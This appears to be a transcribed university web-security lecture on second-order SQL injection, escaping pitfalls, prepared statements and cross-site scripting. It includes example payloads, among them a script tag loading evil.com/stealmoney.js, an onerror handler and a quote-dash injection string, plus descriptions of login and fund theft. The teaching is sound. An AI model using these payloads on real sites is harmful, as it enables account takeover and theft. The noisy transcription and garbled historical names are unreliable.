 All right, folks, let's keep going. We got one more week of class left, right now, we're all excited. One more week, the final, the final CTF, so everything should be awesome. All right. Two more, we're going to finish off covering sequel injections. We have a study of cross-site scripting, one of the most common prevalent vulnerabilities on the web today. So I'm going to suddenly sum up what is the essence of a sequel injection vulnerability. I would say close. You may be able to write to the database, you may not be able to write to the database. But how do you get there? How do you actually, what's the code vulnerability that exists in the web application that a lot of you can perform a sequel injection? What kind of strings? Exactly. So commands, user, concatenating together, constant strings with user info in order to create a sequel query. This is an important thing. Please don't leave this class thinking that concatenating strings is a vulnerability. I don't want you to tell me about that. This is not true. It's using that string in order to issue a sequel query that when it becomes a vulnerability. Cool. So what can you do with a sequel injection vulnerability? You can potentially drop the database, get information. You can get access to the server. Yeah, you may be able to get, well, we didn't talk about it, but yes, there are ways in some databases to get levered a sequel injection exploit to get code execution on the system. What else? Yeah. You can get all the data from the database, right? So this is a big business. When we talked way, way back in the history section, we talked about Albert Gonzales, who is the leader of the Shadow Crew, Hacking Crew. They were responsible for hacking the DJ Max Hardland payment systems. And what they do is they would war drive around these retail locations. So war drivers are going to drive around looking for unsecured Wi-Fi. So they find unsecured Wi-Fi on the network, get on to the network, and then once they were on to their network, we're able to use sequel injection vulnerabilities to get in and steal customer's credit card data. So they made, well, I mean, a ton of money, actually. It's over 100 million credit cards they sold. And so they make millions and millions of dollars using sequel injection vulnerabilities to steal credit cards. They got really crazy. They got into a Hardland payment system with this credit card processing company, and so they were able to, I don't know if it's exactly through sequel injection, but they're able to get onto a credit card processor to the thing that was processing every single credit card and just steal all the credit cards that were going through Hardland payment systems. All right, cool. So sequel injection, as we know, we have some cabinet strings together including unsanitized user input that allows an attacker to alter the semantics of the sequel query. There are other types of sequel injection. So there's the classic example where we saw where the user input that we gave into a form was used as is in the query. And so that would be kind of a regular standard sequel injection. A second order sequel injection is pretty cool. The idea is oftentimes when you put data into the database, it's sanitized correctly. So you do your insert statement, you make sure the data, you call the sanitation function and my sequel real estate string. So the data gets into the database just fine. But later on in the application, there's something that fetches that data from the database and then uses that as part of a query, a sequel query. So this one's got a second order sequel injection. So the idea is when your database is into the application, it's perfectly fine. No vulnerability at all. But because that data came from an untrusted user, it's later used to construct a sequel query and that's going to become the big issue. Cool. Yeah. So think about an application that has a username and your username you do whatever. John tick dash dash, which is a valid name. I mean that says whatever your application is. And it safely escapes it. So it's inserted into the database with using the slash tick so there's no possible way on the insertion that a sequel detection vulnerability occurs because the username is in between two single quotes. There's no possible way because every single quote of the attacker's input is being translated to slash single quote. So that's all perfectly fine. This is a 100% legitimate code that you can write in your application. So you said all you need to make sure is whatever the user's inputting is in quotes? Well it depends as long as you sanitize it such that it does not change, the user input cannot change the syntax of the sequel query. So in this case if their input is in between single quotes and you properly receive it then there's no way they can change the syntax of that sequel query. You can think of it as there's no way to break out of the single quotes because they cannot put in any character to transition the sequel parser to another state. But later on let's say in the update password function you get the username from the database and the here you've gotten this name value from the database so the developers assume that it's safe because it's from the database. It's not from user input like a get form or a post form. And so you update the user set password equal to tick where username is equal to john and now your single quote that was safely stored in the database is now causing a sequel injection vulnerability because it's being reused at a later point of time in a sequel query. So this would be again it still comes back to concatenating strings from user input the question is where does the user input come from? Does it come from a directly from the user or does it come from database stored in the database? Once john is stored the dash dash should not be there. Why? Because that's the end of the query, right? I mean that's what it says. The web application is probably sanitizing it to be slashed in. So just like in a double quotes in a string, in a program language if you want to put a double quote you do slash double quote and now it parses it as you mean the double quote character. So here you can insert arbitrary data into a database. It doesn't need to be text, right? So we can say create a user with the username of john tick dash dash. And so the web application sanitizes that, changes the tick to a slash tick and then so then this whole query will be insert into user's username whatever password values and then single quote and then john slash single quote dash dash. So that all gets stored as the username in the database. And so because it's think about a prominence issue in some sense. It's like where did this data come from? This data came from the user and yes it was sanitized when it was put into a SQL query at the start but that doesn't prevent any type of crazy characters. So that means when you're reusing that data later you also have to sanitize it because you have to know that it comes from the user possibly. So we can look at an example here. So this would be like the register pane. So we're making a SQL query in PHP. We're going to insert into users username password values and so here we're doing a single quote. So we're doing parentheses single quote. MySQL real escape string post name. Closing single quote that's going to match that starting single quote in our values clause comma single quote MySQL real escape string password and then concatenate single quote and parentheses semicolon. And then we're going to query that. So there's absolutely no vulnerability here. This is 100% secure code. You cannot cause a SQL injection. There is no SQL injection vulnerability here. Even though you can concatenate strings together. Why is that? Yeah, because we're... Because we're... So I lied a little bit but that's fine. I mean maybe, I don't know. Okay. Let's look at what did I lie. So what does this MySQL real escape string need to do? So I said it translates ticks to, what did I say, slash tick? The backwards slash. Sounds right. Okay, looks right. Yeah, good. Okay, perfect. So this means if you have some SQL query and you have where foo is equal to tick your user input. There's no... With this, if you put in a single quote, it's going to go slash single quote. Therefore you shouldn't be able to transition this to some other thing. So if you put in a single quote, you're not going to be able to do that. But this is a bad sanitization function. Why is it bad? So think about every time you've ever done some kind of sanitization or an escape character that we looked at. Like for instance, URLs. What was the escape character of URLs? Percent. Percent. Right? So you have percent and then the code. So how do you represent a percent character in URL coding? Percent percent. Not percent percent. It's not? Seems like it should be. You do have to escape it. How do you escape it? Then you have to probably escape the background. It has its own percent code. Yeah, so you use percent code. It's percent 25. So the percent character encodes to its own percent 25. So for this language at the most, I mean you have to study the syntax here to understand everything, but it's pretty clear if you're having slash single quote mean single quote, how do you escape a slash? Slash slash. Right? So what if... Okay, let's play a what if game where I'm a SQL query. Dude. What? No, no. So my input's foo. My output's going to be foo. Right? Wear foo and then the out use in the SQL query will be where foo equals foo. Is there any SQL detection in here? Have we changed the syntax of the query at all? No. No, not at all. Cool. Okay. What if I had foo? That's going to translate to what? F, backslash, tick, oh, oh. And that's going to be where foo equals single quote F, backslash, tick, single quote running out of room. I'm just going to start over. Slash, tick, oh, tick, tick. So then what am I testing? What? So in SQL's parsing this, what's the string that it's going to compare against? F, single quote, oh, oh. Right? Because to hit, remember, this is just a way to represent the single quote character inside of a single quoted string exactly like every single program that you've ever used. So you're very familiar with this already. What if I, so, is this secure against SQL detection? What if I did this? What's that going to be translated? So F, slash, single quote, zero, zero. What's that going to be translated into? This is my transformation function. So it's going to happen. Triple slash? Triple slash? How's that triple slash? So does, my rule is transform a single quote to slash single quote. So do I change the slash at all? What do I do with the single quote? Slash single quote. Slash single quote. So I have my original single quote. I have my slash single quote. I have oh, oh. And then that's going to be into where foo equals single quote F, slash, slash, single quote, oh, oh, single quote, semicolon. So, so how will this parse? Slash single quote. What was that? You're going to be scaling the backslash because we have two forward slash here. So the SQL engine is going to parse that out as a slash character. And it sees the single quote. So it's the single quote. It's the ending single quote to match the first single quote. And now I have a syntax error because I have this oh stuff afterwards. So it's not about SQL query. Was I able to change the syntax here? Yes, because, so this is, okay, so this is a good example of A, never write your own sanitization routine because you're going to do it wrong. I can guarantee you. And you don't have to believe me. Even the built-in sanitization functions sometimes get it wrong. Sometimes they have a lot of new lines. Sometimes they have a lot of crazy stuff. And they have to be fixed and updated. So do not do it yourself. You should definitely do it wrong. And there's a lot of ways to get it wrong. So yeah, so this, so we also would need to do slash. So we need to do it. Okay. So now if we add slash to slash slash, does that get us to where we want to go? If we take the same example, now we get foo slash tick oh oh, that will give us our nice F slash slash tick oh oh, which will be where foo equals single quote F, triple slash, single quote oh oh, single quote. And then now how does the SQL engine parse this double quote, or these two slashes? That's one slash. That's one slash. And then what about the slash single quote? Slash single quote. A slash single quote would be exactly what we wanted to have. But we need to handle all types of these things. This is why you don't want to do this yourself. Okay. But this function does this. MySQL real estate escape string. It does the query. It inserts it. It gets the inserted user ID from the database and sets the user's session to be this user ID. So in this case, there's absolutely no way you could change these semantics of that query or the syntax of that SQL query because they're using this MySQL real estate string. Now on the change password page, this is a code that any of us could write. I've probably written something similar before. So you get the password. So if you want to change your password, you need to have a new password which you change it to. You'd also need a way to make sure they're logged in and all that kind of fun stuff. So I'm going to fetch from the database, get the username and password from users where the ID is the session ID, which we set earlier. So there's SQL injection here. Yeah, so there's a MySQL query. It's select username and password from users where ID equals concatenate the session user ID. So the user ID that we set on the register page, which was the result of a call to the database, I believe it was MySQL underscore insert underscore ID. We're setting that to be this underscore session UID. I can't hear you. I mean, isn't it global? You're wanting to change it during the execution. It's a global. I mean, dollar sign underscore session is a global. But what does it mean? So it's possible to change it during the running of this page. That's not a problem. How? The way that you're passing the formula. I don't think you can do that to a super global. I think we are super global. You can't directly change that. Is this like have something to do with like accessing the cookie in the session? Yeah. So how do we handle sessions? Well, what do we want? What's our goal? You can't just say maybe just change something. Well, that's something to happen. That's over your goal. You can't do that. You can't do that. You can't do that. Right. So the question is, where does this session UID come from? Right. If it's in the cookie and we can change it, then there's a clear sequence of actions on it. Should you store user data in a cookie? No. Why not? Yeah. Because they can change it because they can do this, right? And from the morning, you just change the user ID to be any user and completely change who they're logged in as. Right. So page B, as much as I've been hating on it, it does do some things correct. And one is the default behavior of sessions. So a session sets a cookie that's a random. You can look at it. When you browse the web, you'll see it's all the time. Page B, session ID, I believe, which is a random value that maps to, on the server, there's some, I can't remember where it usually is, it's some far, something, basically all the session information is stored in a file. So that's where the user ID is stored. It's a file on the server that only the web server has access to. And so you can't change that. And so because who set this session you ID value? We did. The application did, right? We set it to one. Not exactly random, some ID from the database. So the database told us, let's see, MySQL, so MySQL insert ID, so when you call an insert statement, if you have auto incrementing IDs, this will return, what was the ID of the row that you just inserted. So you know that's that user ID. So we're setting this here, unless we would have to check, maybe there's a weird case where for whatever reason, user data flows to this session, you ID in which case, yes, there could be a possible SQL injection because if they can change that value, we're going to have a bad time. But normally this would be fine because we know it's an integer. We know we control it. Still, we should escape it anyways to be 100% safe. I would definitely do that. And this hopefully shows why it's really difficult to reason about the security of these types of things. Because if there's any code in any part of our application where user input can flow and change the session you ID value, then we've completely compromised the security of our applications. Okay, so we fetch this from the database. We then say, well, I know the new password, so the password that was passed in through the post parameter, so that is an unsafe string because that is coming directly from the users. So I'm going to escape that. So my query is update users, set password equal to single quote, my SQL real escape string, new password, concatenate it with single quote where username equals single quote, and then concatenate it with the row username. So the username that we just got from the previous query. And then we'll do that query. And where did row username come from? Yeah, from the register page. Right? Sorry, you're right. Row username came from this MySQL query and where did that data come from? Yeah, from the user. Right? And so what makes this even more difficult as you think about how applications scale? So let's say we were super selective in our register page. We, like, let's say we make sure that user names are only alphanumeric and with no spaces. You can restrict it enough to where it's almost impossible to do a SQL injection, although not, yeah. So let's say we're at, let's say, not even just out, like, yeah, just A through Z, that's where your username could be, nothing else. Right? And say it's impossible to have a SQL injection if you need to transition the context from there. So let's say we've done that, do we have to restrict the practice to restrict the size of our user or not the size of the space for our user names? Cool. So if I guarantee you that on the register page that's the code that we have that checks that and enforces that, is this, could this be a vulnerability? A through Z? On the past one? On the username. Basically it's the vulnerability. Same? So we wrote it in the DHB, we wrote it in the IF condition, then checks will go back to the other page. On the register page we'll check and make sure that we'll say if the username is not A through Z then exit and say, terrible, don't not gonna allow you to create a username with that new monster. So is this safe? Yeah. Are we storing the password? No. That doesn't matter. I think it's safe. I think it's safe. That's my goal. I would also act hearing some safes. I would say it's safe. But what if there's a place where you can change your username? You may want to change your username. We have to make sure that that enforcement is done there as well. Next, what happens when our company wants to develop a mobile application and you want to be able to register at some point so that the mobile application can talk to that to register users which is going to probably be completely different code than the register page that you have on the homepage. And now you have to make sure that that check is also validated there. And then let's say what if you merge with another company or you have some agreement where your company is working with another company and you want all of your users to be able to automatically import all their data from another company. So then now you have another endpoint where data is coming into the system and you don't control, right? And so if all you're doing is relying on the fact that, no, no, my input is good when I put it in the database, you cannot trust that. You have to always assume that data in the database could be dangerous online. Security's hard. It's kind of the moral there. And this is actually a super fun but really tedious type of SQL injection to exploit because you need to go create a user first and then change the password and then get an error message and then create a user again and then change the password. I guess you can script these things but that's a different way of thinking. Okay, so how do we prevent SQL injections? They seem terrible. Have I scared you with them enough? No? Do you want to go back and we can talk about more stuff? How do we solve them? It's actually nothing to do with the database itself. But it's not the database's fault that we have SQL injection vulnerabilities, right? Because the database is doing exactly what we asked it to do. We sent it some bytes and we said, parse this as a SQL query and then give me the results. Those were the webpackers and remember that it said a good way to prevent some of the taxes to you to make sure that the information that can be stored in the database is probably I think we're getting there in a second. So let's, uh, yeah I was confused about the term of the database. I usually tweet the database because it's pretty dumb. Before we lost the query in the database we were parsing from wire. Yeah, so one, so basically, and it goes down to that problem, right, of parsing queries. Fundamentally we don't want to parse queries. We don't want the database to have to parse queries. And we definitely don't want the database to parse queries with user input. So this is the key is the goal is of protection is never allow a, never allow clients, clients apply data or you attack your data to modify SQL statements. This is the core. How you do that depends a lot and they have different pros and cons. Yeah, okay. So one of the ways you can do this is to use some databases have some ability to do stored procedures so you can write some SQL queries into the database, essentially save them and later say, hey, make a query and pass this data to it. Which is, I think, right what you were talking about. It's kind of annoying. It's, I don't know, I've programmed it in both ways. Stored procedures can get hairy and I've seen some stored procedures that themselves have SQL detection vulnerabilities because they're fetching data and creating queries dynamically. So there's this and it says there's interesting dynamic because essentially you're putting logic into the database. Right? But a lot of the philosophy now is much more like your application should have all the logic. The database should just be done storage. So there's also a tension there. The other best way to do this is with prepared statements. So this is what I highly recommend. The idea is this is exactly, so rather than a one step process where the web application says here's my bytes pass this into a SQL query. It makes a connection first and says here are my bytes. This is the SQL query that I will execute with placeholders my placeholder 1 to this value my placeholder 2 to this value and then execute the query. So the idea is you're separating the parsing from the actual input of user data. And this is the absolute best ways to go. So you basically specify the structure. So if you look at it, it looks like this. So this would be some PHP syntax. Select star from users where username is equal to colon name. So here in this syntax, colon name is a placeholder and tick password equals SHA1, concatenate pass with a salt and at once this is actually a good query with salted patches. And then you issue a bind parameter to say bind the bind colon name with actual dollar sign name and then bind colon pass with the parameter pass and now when you execute this query because the SQL engine has already parsed it has the parse tree, it does not need to know how to parse anything because it's already done it on the query. Now does this prevent you from issuing a prepared statement with user input? Because you don't have any user input until you bind it. So what if I deleted this colon name from the prepared statement input dollar sign name and deleted this bind parameter and put single quotes around it because that's why I like to do it. And you're building the parse tree based on dollar name. Yes, which we are going to see what's actually more important than it being. Yes, so this is why it is a I think it's one of the best, one of the things that I recommend the most the problem is you have to be vigilant in your application and it's a lot to check in some sense because you have to just look at every single prepared statement this DB prepare look at every single one of those in the application and see is this a constant sure or not. If it is a constant sure I'm going to do it again. Is the colon a delimiter for a parameter? Yes. So okay, so if you were to Yeah, no, no, no, it's good. Here, let's go through an example. My interest, I was considering doing this. All right, we have was it select star from users where user name is equal to colon name and it's going to be annoying to do, but that's okay. All right, so we have select star from users where user name is equal to colon name and passwords equal to sha1 can cat colon pass salt. All right, so when that the thing again like I keep saying over and over it all comes down to parsing. So when the sequel engine parses, so when the prepared statement parses this query, it's going to say well, this is a select there's a select statement, right? So it's going to do just like you did in like 340 and all those other classes. So it'll have some select and I don't know the exact parse tree, but you can actually look this stuff up. That's kind of cool. Star, I think the other thing that's important is users and then there'll be a where clause where has two things let's go like this. It'll have some kind of like and and on the left side of the and it will be a quality comparison with on the left user name on the right it will be colon name and on the right side here now we have sha1 and on the right so it's not going to be expanded indefinitely exactly this is the key point. So when you call dbprepare the seedlending takes this query, turns it into this parse tree and later when you say bind name colon name to this value it goes to the parse tree and it says ok great wherever here user name equals boom, whatever you put in for name you would literally put in any single values there's no possible way to change the syntax of this query because you already parse it so even if you put names equal to colon parse or something that's the value because you're already past this type of when you're binding things does that make sense? so yeah you're not parsing it again so this is the key is kind of parse it once you keep the tree structure and then you put in each of the elements here and this is actually when you get down to the core problem of SQL injection is because this is what the developer wants right this is if you paint on the developer's mind this is the query they have in mind when they were writing the SQL query right but the problem is what SQL injection allows us to do is essentially from this colon name to be able to completely change the syntax of this query and so it will change it into different trees and all this cool fun stuff but that is really at the core there any other questions on it? so another thing that I don't have on the way to talk about really is use a good like object relational map that you use some kind of good database interface so for instance Ruby on Rails has a library called active wrapper which is one of the ways you use to talk to the database and if you use the default standard ways of interacting with that it basically guarantees no SQL so it has things like you create rather than creating like this where I'm creating a SQL query it adds a layer on top where you interact with objects that then issue queries to the database or to interact with it so if you want to get a user with a certain ID you call a method I believe of the users class.get and then you pass in ID 10 and the engine would take care to make sure that everything was sanitized and it did the proper prepared statements or that you can also do complex things like you can create users so you create an object and then you save it in the database and it creates the insert statement for you so you don't have to worry about any of that. The tricky part and this is why I have a conflicted relationship with these object relational mappings is they can they can, well there's a couple of things so A they're not often super efficient right because they're general purpose libraries so they're sometimes with many of an object you don't store whatever you have a column that's huge that you don't want to get all the time so if you're writing queries by hand you can do that and so what people do is oftentimes they have to drop down they use methods of the ORM this database wrapper to directly issue SQL statements and SQL queries because they realize oh the ORM is super slow on this query this means I need to write it by hand and when they do that because they're not used to writing SQL queries by hand and not having SQL detection vulnerabilities they end up introducing vulnerabilities that way so it's kind of insidious like it's great because it helps you never think about a database but now once you have to think about a database those are the times you really need to be very careful with what you're doing so if there's no magic bullet to security I guess is the moral cool sanitize your inputs yeah this is like the third visually including it lower so this would be right SQL query by hand and manually sanitize all the workloads every single time it's a recipe for disaster yes regarding the object relational mapping those are stored on the server right they are yes stored on the server code there's no way someone could change the definitions if somebody can change the code that's running on your server you have bigger problems than a SQL injection yes much bigger problems it's like similar thing of like well if somebody uploads PHP code on your server and starts executing it you have massive problems right it doesn't matter you don't have a SQL injection you have a remote code execution so they could do whatever they want there cool is that because with the sanitize inputs because there's no perfect sanitization function it's not that for SQL injection if you're if you know what you're doing you can do that very simply you just have to do it literally every single place like that's it needs to be a I mean it's very similar in terms of arrays using buffers and seed you can write a seed program that is secure that's not impossible it's very very difficult because you have to be not just every program point needs to be correct but every path in the program needs to be correct and that's the really difficult part to think about and especially with something like the web we're not only on their multiple paths but there's multiple different orderings of requests to the web application so you have to worry about that stuff as well but yes you could you tend to do it I'm trying to advocate for good about permitting okay so now I'm going to be the cross-site scripting so cross-site scripting is one of the oldest 100 buildings on the web and it is still despite 20 plus years of research or if that may be a slightly over approximation but despite tons of research you can go probably right now if you kind of remember any of the popular sites that you looked into like XSS I want to if you look there's like tons of examples of Google Microsoft, Facebook they all end up having to see one direction of order abilities in that somewhat despite these massive efforts from these companies and there's this site XSSED.com for the name for the title it is right yeah so that that just is a site that keeps track of cross-site scripting vulnerabilities on the web that have been publicly disclosed and the whole point of cross-site scripting so if we think about the entire point of the SQL injection is to change the syntax of the SQL query so that we can alter and change the data to the database fetch it, delete it, or get it cross-site scripting comes down to the same origin policy so what is the same origin policy example yes it's almost like that was an important part of the course of why I was on an exam it's crazy what was the essence of the same origin policy you want to say you're going to XSS but you still have some kind of oversight so it comes down to even things like could you use all kinds of things right so if you're using your browser and you have say two pages open and two tabs or even a single page that has multiple iframes it should never be the case that some attacker could influence what is shown on facebook.com or your bank's website right the only thing that should be executing there is and so the same origin policy will have you tell what's from the same origin right so protocol hosting and port is how you determine it and really everything that would sequence a cross-site scripting comes down to is bypassing the same origin policy so the equivalent thing of cross-site scripting is basically an attacker getting to control the JavaScript that executes in something like facebook.com or google.com which is circumventing the same origin policy presumably the developers of those sites do not want attacker to execute JavaScript okay so this is key because this is the core idea behind cross-site scripting so this is and a lot of people think about well it's JavaScript executing and your browser and blah blah blah but it really comes down to bypassing the same origin policy and this is key so so we like to kind of classify and think about cross-site scripting in a number of in a number of different ways I don't know I kind of hesitate I mean this is something that I guess is taught and I guess should be taught it's kind of a weird arbitrary distinction although it does help a little bit and so the idea is cross-site scripting can come in basically it's the similar problem web applications with generating SQL queries as it is with so when we saw when we looked at like a PHP page how does it generate the HTML yeah print it or I mean really everything outside of the PHP special PHP tags is just output as is and everything in between is interpreted as PHP code so essentially if you think about it PHP itself is concatenating strings together to create the HTML output to send to the user's browser and so what does the browser get? yeah the browser gets HTML what does it get? from PHP so PHP has HTML output yes but how does it know that it's HTML from what? the dock type maybe but it has to be able to read the dock type it parses the the document it receives yeah so what does it receive? it doesn't receive a document it receives bytes a sequence of bytes here's this hex value this hex value here's the sequence of bytes so the browser's job is to take those sequence of bytes and to create some meaning from it and so the main way is looking at headers and doing all kinds of other tricks to figure it out but in the case of HTML it's going to take those bytes and parse it like an HTML page so we look at HTML we saw all the tags all the various tags so when we look at HTML how does a developer say I want this JavaScript to be executed on this page? script text that's what it comes down to I know you guys are upset ok so we have an HTML page start HTML tag end HTML tag in between those two we have other stuff and let's say I want some JavaScript code that's going to pop up in alert because that's super annoying or alert that says hello world so let's say this is bank.com some bank's website so the developer wants this JavaScript code to be executed on the user's browser so how to make sure that that happens ensure they make that too strong a word isn't it a lot of the pop up that comes up? that isn't HTML I thought that was a browser object let's just think about ok so I'm just trying to as a developer I want this JavaScript code this alert hello world to be executed every time a user visits my page how do I make that happen? this is not a trick question make a script tag and put it in the HTML this is not JavaScript but the script the script tags are the way that I communicate as a developer to the browser I want this code to be executed so that when the browser gets the sequence of bytes it parses it and it says oh there's the HTML tags and I'm creating the HTML3 structure oh there's a script tag I know how to parse script tags I'm going to check what language it is I'm going to parse it like JavaScript it's an old JavaScript parsing engine and everything goes from that so how did the browser know that the developer intended for this JavaScript to be executed on the script tags on the page that it got right? if you think about it the browser is pretty active that's all the browser knows the browser only has the bytes that are sent from the server and so it looks for script tags I'm not trying to trick you this isn't a trick this is thinking through different things from different perspectives so what if I had the page of bank.com had a super cool feature so start HTML and HTML and then in between has an H1 tag, a heading tag so it's super cool and it says hello and then after that there's PHP code to do echo dollar sign underscore get username it's not a great example it's fine for that cool so when you go to bank.com username is equal to foo what's the HTML page again? a page like this that's going to say hello foo so then what if we access well I guess that was there and what if we access so what if we're a really cool bank we want their name to appear bold we don't just want their name to appear like a regular name so what if we did what if we added username we'll add the bold tag around foo and so what's the output of this PHP request this request this PHP page would it be hello and then a start B tag foo and then an end B tag yeah sure you can do that I have faith in you also the browser you believe it will you are on the code for you so you don't need to worry about it too much okay so when we get this back we so the browser from the browser project what if the browser get back for making this request raw fights that means to parse an HTML so what does the browser do when it sees this B tag it says oh this is a tag and there's some style sheet associated with it it's typically means make it bold and so it's going to turn it bold did the developer this application intend for that bold tag to be there this is on a p-feet code of the page there's nothing in there there's no B tag anywhere where did that B tag come from it popped out of the ether it came from user input it came from the URL of whatever the request was so now what if we wanted to rather than what if we wanted to use some JavaScript to pop up an alert box with the user's name of foo could we do that yeah so what would we set the user name to so we can change these B's to script and then a slash and then inside so we have a script tag we have alert foo and then an ending script tag and so now when the browser makes this request to the web application what does he be doing with the user name parameter it's just concatenating it with all the other strings right if you think about the PHP code there's this first chunk of static code a static string so exactly the same as a SQL query we have a static part of the query and now you're appending the get parameter of user name and then after that there's a static part of the page of this ending h1 tag ending html tag the application does exactly what you told it to do right the PHP application is concatenating your strings together and returning that outlet to the user so it's so now when your browser gets this it's going to get this series of bytes oh that's not true it's going to get this series of bytes right so when the browser parses this what's it going to parse this page as html so it's going to parse this html page it's the start of html page it's got an h1 tag to the heading tag inside there there's a script tag so it goes oh I know how to handle script tags this must be some JavaScript code parses inside there there's alert foo as JavaScript executes it pops up in alert pops did the developer want this script tag to appear here no how do you know that yeah it's not there in the PHP source code right and so let's say that I send you a link to bank.com username script and here I'm not going to do inline script I'm going to do script source equals evil.com slash x.js so now I have rather than inline JavaScript I have an external JavaScript referencing a JavaScript file that I actually let's change this we'll change it to stealmoney.js so when I get that now let's say I create this link I URL encode this parameter and then I send this to one of you is somebody going to click on this link yes I mean if it came from me you'd probably all click on it but even if it was somebody else you'd probably still click on it anyways which you the you standing here or the other you exactly yes somebody's going to click on it so and so so think about it this way so I send you this link here's this awesome bank.com link and let's actually maybe I can pop this over a quick in URL encoded so it looks better okay so I send you a link like this seems fine I even you may be skeptical of these script tags but if I change all of those into URL encoding there's no way you're going to look at those very comfortably a lot of URLs have this kind of weird like in data encoded into the URL so who would think anything of it I can send you a like tiny or short URL so that's even shorter maybe I can use something like Google's shortener so it looks like it has more weight because it looks like it's from to Google or whatever anyways there's a lot of ways you can get somebody to click on this link so you click on this link so and the HTML the sorry the PHP code is going to execute and then where this echo is it's going to output hello and then a start script tag with a source attribute of evil.com slash stealmoney.js followed by an end script tag so what is it going to do when it sees this and what is a external JavaScript does an external JavaScript respect the same order of policy no it's complete it's a whole in the same order of policy to allow a developer to include code from a third party domain that they want to be included in that page so where did this JavaScript code come from from me from the attacker right but it's executing now in the domain of bank.com so I completely circumvent the same origin policy because I've tricked you or essentially not you but I've tricked your browser to execute code that's origin came from me but it's actually executing in the same origin of bank.com and at this point we've seen what we can do with JavaScript where's some stuff we can do with JavaScript so we could that's good so we can if this was on the login page we could put JavaScript to steal your username and password as you filled it out on the page do you think the validation is a component um yeah we maybe I mean the validations that may or may not help us they kind of depends what else could we do what types of requests can you make with JavaScript Ajax requests of the same domain does a web application care if you're making Ajax requests versus normal HTTP requests no they almost never tell the difference usually I think you technically can do something better than Ajax but for all intents and purposes nothing so what is this web application what would something like bank.com allow you to do nobody's used the banking website before transfer money that's just an HTTP request and if it comes from JavaScript in the same origin as bank.com it's going to get sent all of those cookies along the way with an Ajax request so you can steal old transfer money that's why it's equal as you're willing to be you could have applied for loans what about change their password you may be able to change their password it depends on the functionality there um what about so we saw one of the main features of JavaScript and the reason why it was invented was to dynamically update and change the DOM right the whole UI of the page so what if we wanted to steal their username they're already logged in so it doesn't show them the login page we can't really control over the UI of their page but if we change the UI so it looks exactly like the login page and then they type in their username password but instead of going to bank.com we could just change the action form and go to us or we can have JavaScript intercept that request steal the username password and then maybe even lock them in or just change the web page back to the normal thing so it looks like they've locked in what else could we do maybe change the email associated with their account we could we could if this was let's say um we're really really good now and we'll see an example of this later but we could use this to maybe like in a lot of banks now we always like send people money or something like that or maybe even send a note or a message to somebody you could send that note or a message with a link to this cross-exaggeraging attack but when that person clicks on the link now the JavaScript code is executing their browser and so you kind of have this viral spread of infections good the one thing I'm glad that nobody said you can also steal their cookies you can steal their cookies and send it to the attacker now the attacker could potentially log into the website but honestly we've seen there's a lot of different measures that protect deliberately against that we saw a measure I believe it's HTTP only so that cookies are only sent through HTTP and not accessible to JavaScript particularly for this reason however and this is kind of the standard answer whenever most people say oh cross-exaggeraging they think stealing cookies but really you don't need to steal the cookie the browser has the cookie it will send that cookie along with any HTTP request that you send so you don't need that at all you can do any action on the website that the user can and it fundamentally comes this would be this is an example of what we call reflected cross-exaggeraging where the input is in the URL so the web application takes some input from a URL parameter and reflects it kind of back at the user I don't really like the name but I think we're stuck with it so let's look at an example the other type would be stored as stored cross-exaggeraging where you can think of the JavaScript code is stored in the database such that everybody who views that page sees that so the great thing about this there's two ideal examples for reflected it would be a search functionality in a web application so you type in your search term you want to search for food bars it takes you to a search page instead of you search for this that's like a classic SQL injection comments on a blog are a great stored SQL sorry, stored cross-exaggeraging so basically you make a comment including JavaScript code and then everybody who views that page gets that JavaScript code not just you it is nice that we have this distinction because for a stored cross-exaggeraging you don't have to trick somebody to visit that particular link you only need to trick them to visit that particular page that has that content the third one is actually I'm going to stop using this term it's called DOM-based cross-site scripting but I prefer the term client-side because the whole idea is attacker controlled JavaScript executes in the same origin so the idea is where does that come from does that come from the URL database in which case the server-side code is responsible because it is concatenating strings together to send that to the browser but JavaScript as we saw has a lot of awesome functionality like an eval function which turns a string into code so if the JavaScript code that's running in your browser that was written by the developer takes your user input like one of the URL parameters and calls eval on it then that's a cross-site scripting vulnerability it's called DOM-based because it usually happens in the DOM I like the term client-side XSS and that one is starting to change so I'm making a push for that so for reflected XSS we already saw this example of this name so I'm not going to go over this too much we can see this in here this is kind of one of the standard things so this seems very simple right? I mean this core idea I think the browser has to end up with JavaScript there's no other way you can do it what are all the ways we can trick the browser to executing JavaScript so script tags, obvious one what else? what was that? external JavaScripts eval functions, what else? how do we do our validation when we did client-side validation? yeah it was on submit HTML elements there'll be handlers that you can set to be JavaScript so on submit a classic one when you do cross-site scripting here's an image tag with an on error function and that is a string that gets turned into JavaScript code so there's a lot of different ways to trick the browser into executing JavaScript that is part of what makes it difficult the other part comes in with how do you do it it's very tricky okay we talked about all of this so this is an example of a DOM-based this was fake this is not real I just changed the URL but the idea would be you go to www.facebook.com slash script source hdbs.com slash hacker what we see if you went to this would be a if you were logged in the normal Facebook page would pop up the JavaScript would execute so if you think about it this is much more effective than a normal phishing attack because you are on facebook.com you are still on facebook.com you have the green lock everything is telling you this is facebook.com you just log back you just need to log back in but you have no indication that some attacker-controlled JavaScript is executing cool so we talked about stored cross-site scripting stored cross-site scripting has a lot more potential in thinking about all the different ways that anyone who visits that page can be exploited we covered that great that was actually one of my questions so I can understand setting the URL kind of lowly anybody can visit it how would you target somebody with this how would I target somebody someone like you specifically to click on this yeah so to target somebody specifically you need 12 you still for a stored cross-site scripting you still need to get them to visit the page so you could I mean how it's been done in the past like for instance Aurora was a attack against Google that the attackers to get a foothold they compromised some facebook accounts that were friends with the target victim they chatted them a little bit they sent them hey you should check out this super cool link and then I think they sent them one link first that basically fingerprinted their system to figure out exactly what software they were running and then they used like an Oday or Nday exploit against that and then later had to click on another link and then from there then they got access onto the corporate network and then spread throughout their methods I think that attack was called Aurora if you want to look that up there's a lot of stuff in there so yeah so your friends is how I would get to target you directly or the other one sorry since we're on this topic the other interesting thing is the watering hole attack so let's say you want to target a military organization or even a specific base you would look at what are the food places that are around that location you would target their system because you know employees are going to visit the menus from their computers so from there you can take them over just from that information along so the final example I'll talk about is there was a case I want to say that something to do with Yankee was the name that's in my head but basically the military in the US was a completely separate network from the internet so it's like MillNet it's completely different they at one point found that some systems on the MillNet were targeting or talking to Russian systems which is a big no-no what they found out when the trace of that would happen is the Russian agents planted USB drives in a convenience store that was right by this military base and this was like five years prior or something and so it took one person one the sake of taking that USB drive and even though they knew they should not plug it into a classified system they just had to do it for whatever reason why they plugged it in and they got off to that system and propagated from there so these kind of persistence long-term attacks can definitely do some fun stuff alright we'll stop here, thanks